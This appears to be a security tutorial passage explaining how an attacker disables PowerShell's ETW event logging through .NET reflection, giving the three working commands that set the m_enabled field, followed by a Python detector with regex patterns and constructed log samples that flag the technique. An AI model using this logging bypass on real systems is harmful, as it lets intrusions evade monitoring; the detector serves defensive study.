PowerShell reflection
In the context of ETW, an attacker can reflect the ETW event provider assembly and set the m_enabled field to $null.
At a high level, the PowerShell reflection technique can be broken up into three steps:
1. Obtain the .NET assembly type for PSEtwLogProvider.
2. Store the value of the etwProvider field.
3. Set the m_enabled field on the previously stored value.
Code
Obtain the type for PSEtwLogProvider from the System.Management.Automation assembly and store it, so that its internal fields can be accessed in the next step:
$logProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
Read the non-public static etwProvider field from that type ($null is passed to GetValue because the field is static, so there is no instance) and store the value it holds:
$etwProvider = $logProvider.GetField('etwProvider','NonPublic,Static').GetValue($null)
Use the stored value as the target instance and overwrite its m_enabled field:
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0);
Compiled together, these steps can be appended to make a malicious PowerShell script.
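As an added defender-side example (not code from the original page), the following Python checks PowerShell script block log text for the combination of reflection calls described above; the sample entries are constructed, and the indicator names are assumptions of this example.

```python
import re

# Constructed sample script-block texts, in the form a defender would pull them
# from PowerShell script block logging (event 4104). Made-up entries, not real logs.
SAMPLE_BLOCKS = [
    "Get-ChildItem C:\\Users | Where-Object { $_.PSIsContainer }",
    "$logProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')\n"
    "$etwProvider = $logProvider.GetField('etwProvider','NonPublic,Static').GetValue($null)\n"
    "[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0)",
    "Write-Host 'm_enabled is just a word inside a string here'",
    "[System.Diagnostics.Eventing.EventProvider].GetField(\"M_ENABLED\", 'NonPublic,Instance').SetValue($p, 0)",
]

# Each indicator is one artefact of the technique described above. A single hit
# can be benign (the word m_enabled inside a string); the combination is what matters.
# Patterns are case-insensitive because PowerShell itself is.
INDICATORS = {
    "psetw_type": re.compile(r"PSEtwLogProvider", re.I),
    "etwprovider_field": re.compile(r"GetField\(\s*['\"]etwProvider['\"]", re.I),
    "m_enabled_write": re.compile(r"GetField\(\s*['\"]m_enabled['\"].*?SetValue\(", re.I | re.S),
    "eventprovider_type": re.compile(r"System\.Diagnostics\.Eventing\.EventProvider", re.I),
}


def match_indicators(block):
    """Return the sorted list of indicator names that fire on one script block."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(block))


def find_suspicious(blocks, min_hits=2):
    """Return (index, hits) for every block that trips at least min_hits indicators."""
    results = []
    for i, block in enumerate(blocks):
        hits = match_indicators(block)
        if len(hits) >= min_hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for index, hits in find_suspicious(SAMPLE_BLOCKS):
        print(f"block {index}: {', '.join(hits)}")
```

Because script block logging records a block when it is compiled, the block that disables the provider is normally itself logged before it takes effect, so a hit followed by silence from that process is a strong signal; string-building obfuscation will evade these literal patterns, so treat them as one layer of detection.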